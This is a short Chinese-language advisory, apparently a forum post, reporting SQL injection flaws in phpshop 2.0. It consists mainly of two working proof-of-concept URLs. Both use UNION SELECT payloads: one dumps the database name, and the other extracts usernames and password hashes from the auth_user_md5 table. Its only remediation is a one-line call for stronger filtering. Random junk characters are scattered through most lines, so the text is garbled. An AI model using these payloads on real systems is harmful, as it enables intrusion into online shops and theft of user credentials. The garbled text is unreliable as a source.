标题 : phpshop 2.0 SQL Injection Vulnerability
3 a8 Y& W, t Y o4 A+ D
' O7 Q! D& z- J( Z, z# l7 a作者 : By onestree
/ l* V2 Y C7 P; f5 @下载地址 : http://code.google.com/p/phpshop/downloads/list
4 Q2 r4 F9 O/ z% M测试地址: windows 7 / ubuntu0 v7 n# V! B0 {2 t
! v( c1 h2 b2 R' t- ]3 Z % D) S9 D' |8 `" Z/ g) e$ N' ~
SQLi p0c:
, V0 q: ?" i b8 m
h" g# O. p Q) e9 W7 L==================9 J8 @$ N6 d) y3 f" e$ x
- k" C8 j$ |; Ihttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
4 D/ d+ S4 |. W7 R' q4 X5 O6 sunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
& F* k+ j8 y* o. Y / Y& F# x0 _# l+ a. j" `
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--% P% S( h* ?: v& ?& H
: d1 V: H- r( D# b& i# b9 R修复:9 u7 {0 p0 M2 u8 P. [/ V) L
加强过滤
7 l6 W' I6 u* O) f. D7 O) E
3 C; ^8 M1 F# R7 w4 F4 H4 O+ W" u5 f$ _- h% B; k1 i( g$ r
|